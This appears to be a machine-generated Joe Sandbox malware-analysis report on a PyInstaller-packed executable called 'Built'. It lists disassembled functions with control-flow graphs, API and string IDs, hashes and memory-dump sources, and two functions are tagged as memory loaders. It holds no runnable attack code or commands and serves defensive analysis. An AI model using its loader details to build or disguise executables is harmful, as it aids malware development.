                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                                        • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                                        • Opcode ID: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
                                                                                                                                                                                                                                                        • Instruction ID: c2d361cd21ac02f42fbc834b316bad703b9ea4bbe7922868f994ac3e733a15dd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE327A22A0C78291FE199B25D7552B937A1AF74780F8C4036FA5DE26DEEF6CE558C300
                                                                                                                                                                                                                                                        Function 00007FF65E2A6964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 467 7ff65e2a6964-7ff65e2a69d7 call 7ff65e2a6698 470 7ff65e2a69f1-7ff65e2a69fb call 7ff65e298520 467->470 471 7ff65e2a69d9-7ff65e2a69e2 call 7ff65e294ee8 467->471 477 7ff65e2a6a16-7ff65e2a6a7f CreateFileW 470->477 478 7ff65e2a69fd-7ff65e2a6a14 call 7ff65e294ee8 call 7ff65e294f08 470->478 476 7ff65e2a69e5-7ff65e2a69ec call 7ff65e294f08 471->476 493 7ff65e2a6d32-7ff65e2a6d52 476->493 479 7ff65e2a6a81-7ff65e2a6a87 477->479 480 7ff65e2a6afc-7ff65e2a6b07 GetFileType 477->480 478->476 483 7ff65e2a6ac9-7ff65e2a6af7 GetLastError call 7ff65e294e7c 479->483 484 7ff65e2a6a89-7ff65e2a6a8d 479->484 485 7ff65e2a6b09-7ff65e2a6b44 GetLastError call 7ff65e294e7c CloseHandle 480->485 486 7ff65e2a6b5a-7ff65e2a6b61 480->486 483->476 484->483 491 7ff65e2a6a8f-7ff65e2a6ac7 CreateFileW 484->491 485->476 502 7ff65e2a6b4a-7ff65e2a6b55 call 7ff65e294f08 485->502 489 7ff65e2a6b63-7ff65e2a6b67 486->489 490 7ff65e2a6b69-7ff65e2a6b6c 486->490 496 7ff65e2a6b72-7ff65e2a6bc7 call 7ff65e298438 489->496 490->496 498 7ff65e2a6b6e 490->498 491->480 491->483 505 7ff65e2a6be6-7ff65e2a6c17 call 7ff65e2a6418 496->505 506 7ff65e2a6bc9-7ff65e2a6bd5 call 7ff65e2a68a0 496->506 498->496 502->476 512 7ff65e2a6c19-7ff65e2a6c1b 505->512 513 7ff65e2a6c1d-7ff65e2a6c5f 505->513 506->505 514 7ff65e2a6bd7 506->514 515 7ff65e2a6bd9-7ff65e2a6be1 call 7ff65e29aac0 512->515 516 7ff65e2a6c81-7ff65e2a6c8c 513->516 517 7ff65e2a6c61-7ff65e2a6c65 513->517 514->515 515->493 519 7ff65e2a6d30 516->519 520 7ff65e2a6c92-7ff65e2a6c96 516->520 517->516 518 7ff65e2a6c67-7ff65e2a6c7c 517->518 518->516 519->493 520->519 522 7ff65e2a6c9c-7ff65e2a6ce1 CloseHandle CreateFileW 520->522 524 7ff65e2a6ce3-7ff65e2a6d11 GetLastError call 7ff65e294e7c call 7ff65e298660 522->524 525 7ff65e2a6d16-7ff65e2a6d2b 522->525 524->525 525->519
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                                                        • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                        • Instruction ID: d0177ce1be0bee088148b4495f113e7439d53a4f72a89d66a43012e1b8f275c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09C1B036B28A4285EF10CFA5D6906AC3761FB59B98F095235EE2EE7798CF78D055C300
                                                                                                                                                                                                                                                        Function 00007FFD948A5920 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 900librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2190517375.00007FFD948A5000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00007FFD941F0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2178262539.00007FFD941F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2178299171.00007FFD941F1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2178299171.00007FFD94492000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2178299171.00007FFD944A1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2178299171.00007FFD94517000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2178299171.00007FFD945E2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2178299171.00007FFD946E3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2178299171.00007FFD946E6000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2178299171.00007FFD947E1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2178299171.00007FFD947EB000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2178299171.00007FFD94864000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2178299171.00007FFD94898000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2191443635.00007FFD948A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd941f0000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                        • String ID: t2k
                                                                                                                                                                                                                                                        • API String ID: 3300690313-2611606847
                                                                                                                                                                                                                                                        • Opcode ID: 617ab41ac5f6266e776372983bbbdaefdcc3e4856b6ef77c3e23bad832221715
                                                                                                                                                                                                                                                        • Instruction ID: a060c3c841819272c84194907a97b1649b3d22b526b7e8c3addf851ca7e7a9c1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 617ab41ac5f6266e776372983bbbdaefdcc3e4856b6ef77c3e23bad832221715
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E62996272919286E7298F38D49027D77E0F749385F048531EB9ED37C9EABCEA45CB10
                                                                                                                                                                                                                                                        Function 00007FFD93B69060 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 850librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2178131881.00007FFD93B69000.00000080.00000001.01000000.00000018.sdmp, Offset: 00007FFD93660000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174982730.00007FFD93660000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD93661000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD93672000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD93682000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD93688000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD936D2000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD936E7000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD936F7000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD936FE000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD9370C000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD938EE000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD939D9000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD939DB000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD93A12000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD93A4F000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD93AAA000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD93B1B000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD93B50000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2175008965.00007FFD93B63000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2178175184.00007FFD93B6A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd93660000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                        • String ID: )tP
                                                                                                                                                                                                                                                        • API String ID: 3300690313-3907340667
                                                                                                                                                                                                                                                        • Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                                        • Instruction ID: 857542cb36d0e0602d1755a0dae54a30c21be986e4bd72496ac58e257de40e08
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E262262272819286E7258F38D8102BD76E5F74879DF045532EADED37C5EA3CEA55CB00
                                                                                                                                                                                                                                                        Function 00007FF65E281950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 269 7ff65e281950-7ff65e28198b call 7ff65e2845c0 272 7ff65e281991-7ff65e2819d1 call 7ff65e287f90 269->272 273 7ff65e281c4e-7ff65e281c72 call 7ff65e28c550 269->273 278 7ff65e281c3b-7ff65e281c3e call 7ff65e29004c 272->278 279 7ff65e2819d7-7ff65e2819e7 call 7ff65e2906d4 272->279 283 7ff65e281c43-7ff65e281c4b 278->283 284 7ff65e2819e9-7ff65e281a03 call 7ff65e294f08 call 7ff65e282910 279->284 285 7ff65e281a08-7ff65e281a24 call 7ff65e29039c 279->285 283->273 284->278 291 7ff65e281a26-7ff65e281a40 call 7ff65e294f08 call 7ff65e282910 285->291 292 7ff65e281a45-7ff65e281a5a call 7ff65e294f28 285->292 291->278 298 7ff65e281a5c-7ff65e281a76 call 7ff65e294f08 call 7ff65e282910 292->298 299 7ff65e281a7b-7ff65e281afc call 7ff65e281c80 * 2 call 7ff65e2906d4 292->299 298->278 311 7ff65e281b01-7ff65e281b14 call 7ff65e294f44 299->311 314 7ff65e281b16-7ff65e281b30 call 7ff65e294f08 call 7ff65e282910 311->314 315 7ff65e281b35-7ff65e281b4e call 7ff65e29039c 311->315 314->278 321 7ff65e281b50-7ff65e281b6a call 7ff65e294f08 call 7ff65e282910 315->321 322 7ff65e281b6f-7ff65e281b8b call 7ff65e290110 315->322 321->278 328 7ff65e281b8d-7ff65e281b99 call 7ff65e282710 322->328 329 7ff65e281b9e-7ff65e281bac 322->329 328->278 329->278 332 7ff65e281bb2-7ff65e281bb9 329->332 335 7ff65e281bc1-7ff65e281bc7 332->335 336 7ff65e281bc9-7ff65e281bd6 335->336 337 7ff65e281be0-7ff65e281bef 335->337 338 7ff65e281bf1-7ff65e281bfa 336->338 337->337 337->338 339 7ff65e281bfc-7ff65e281bff 338->339 340 7ff65e281c0f 338->340 339->340 341 7ff65e281c01-7ff65e281c04 339->341 342 7ff65e281c11-7ff65e281c24 340->342 341->340 345 7ff65e281c06-7ff65e281c09 341->345 343 7ff65e281c2d-7ff65e281c39 342->343 344 7ff65e281c26 342->344 343->278 343->335 344->343 345->340 346 7ff65e281c0b-7ff65e281c0d 345->346 346->342
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E287F90: _fread_nolock.LIBCMT ref: 00007FF65E28803A
                                                                                                                                                                                                                                                        • _fread_nolock.LIBCMT ref: 00007FF65E281A1B
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF65E281B6A), ref: 00007FF65E28295E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                        • Opcode ID: 85b25b29a176bc83ae3a1b74fdbb3e17cfe2198aa0bc5e09dcfbdbd9a14dfb03
                                                                                                                                                                                                                                                        • Instruction ID: 2955832ee81c1f26e9cabaef6cd2b7726c41183c06a2190047b33413ec606662
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85b25b29a176bc83ae3a1b74fdbb3e17cfe2198aa0bc5e09dcfbdbd9a14dfb03
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4819D71A0C78686EF209B25D3446B933A1AF68784F484431F98EE778EDE7CE585C741
                                                                                                                                                                                                                                                        Function 00007FF65E281470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                        • Opcode ID: 00a01140cb6f53c8bf48d507e97df1570cac778f72c2f220bef2ef140620373e
                                                                                                                                                                                                                                                        • Instruction ID: 6ba09c0d8d2edfa4c93e677ee70fcea47ebae8575d2bbd90d0fdeff36de69caf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00a01140cb6f53c8bf48d507e97df1570cac778f72c2f220bef2ef140620373e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B416722A0C74286EE10DB22A7405B97391BF64794F884932FD4DE7A9DDE7CE546CB04
                                                                                                                                                                                                                                                        Function 00007FF65E281210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 530 7ff65e281210-7ff65e28126d call 7ff65e28bd80 533 7ff65e281297-7ff65e2812af call 7ff65e294f44 530->533 534 7ff65e28126f-7ff65e281296 call 7ff65e282710 530->534 539 7ff65e2812d4-7ff65e2812e4 call 7ff65e294f44 533->539 540 7ff65e2812b1-7ff65e2812cf call 7ff65e294f08 call 7ff65e282910 533->540 546 7ff65e281309-7ff65e28131b 539->546 547 7ff65e2812e6-7ff65e281304 call 7ff65e294f08 call 7ff65e282910 539->547 551 7ff65e281439-7ff65e28146d call 7ff65e28ba60 call 7ff65e294f30 * 2 540->551 550 7ff65e281320-7ff65e281345 call 7ff65e29039c 546->550 547->551 559 7ff65e28134b-7ff65e281355 call 7ff65e290110 550->559 560 7ff65e281431 550->560 559->560 566 7ff65e28135b-7ff65e281367 559->566 560->551 568 7ff65e281370-7ff65e281398 call 7ff65e28a1c0 566->568 571 7ff65e28139a-7ff65e28139d 568->571 572 7ff65e281416-7ff65e28142c call 7ff65e282710 568->572 573 7ff65e281411 571->573 574 7ff65e28139f-7ff65e2813a9 571->574 572->560 573->572 576 7ff65e2813ab-7ff65e2813b9 call 7ff65e290adc 574->576 577 7ff65e2813d4-7ff65e2813d7 574->577 583 7ff65e2813be-7ff65e2813c1 576->583 579 7ff65e2813ea-7ff65e2813ef 577->579 580 7ff65e2813d9-7ff65e2813e7 call 7ff65e2a9e30 577->580 579->568 582 7ff65e2813f5-7ff65e2813f8 579->582 580->579 585 7ff65e28140c-7ff65e28140f 582->585 586 7ff65e2813fa-7ff65e2813fd 582->586 587 7ff65e2813c3-7ff65e2813cd call 7ff65e290110 583->587 588 7ff65e2813cf-7ff65e2813d2 583->588 585->560 586->572 589 7ff65e2813ff-7ff65e281407 586->589 587->579 587->588 588->572 589->550
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                        • Opcode ID: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
                                                                                                                                                                                                                                                        • Instruction ID: 361a7965764dfc78baa3e4ad746461db7474328e1aaed3a7052d0dcef977a902
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64517822A0C74285EE60AB12A7503BA7391ABA5B94F8C5135FD4DE7AD9EE3CE541C700
                                                                                                                                                                                                                                                        Function 00007FF65E2836B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF65E283804), ref: 00007FF65E2836E1
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E283804), ref: 00007FF65E2836EB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF65E283706,?,00007FF65E283804), ref: 00007FF65E282C9E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF65E283706,?,00007FF65E283804), ref: 00007FF65E282D63
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282C50: MessageBoxW.USER32 ref: 00007FF65E282D99
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                        • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                        • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                        • Instruction ID: 1aed268da54980dbcc0a3475f997841fd5111a5b9c2872efeebdc468a0c0cdb9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9215161F1C74281FE209724EB153BA3291BFA8354F884136F69EE66DDEE6CE504C700
                                                                                                                                                                                                                                                        Function 00007FF65E29BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
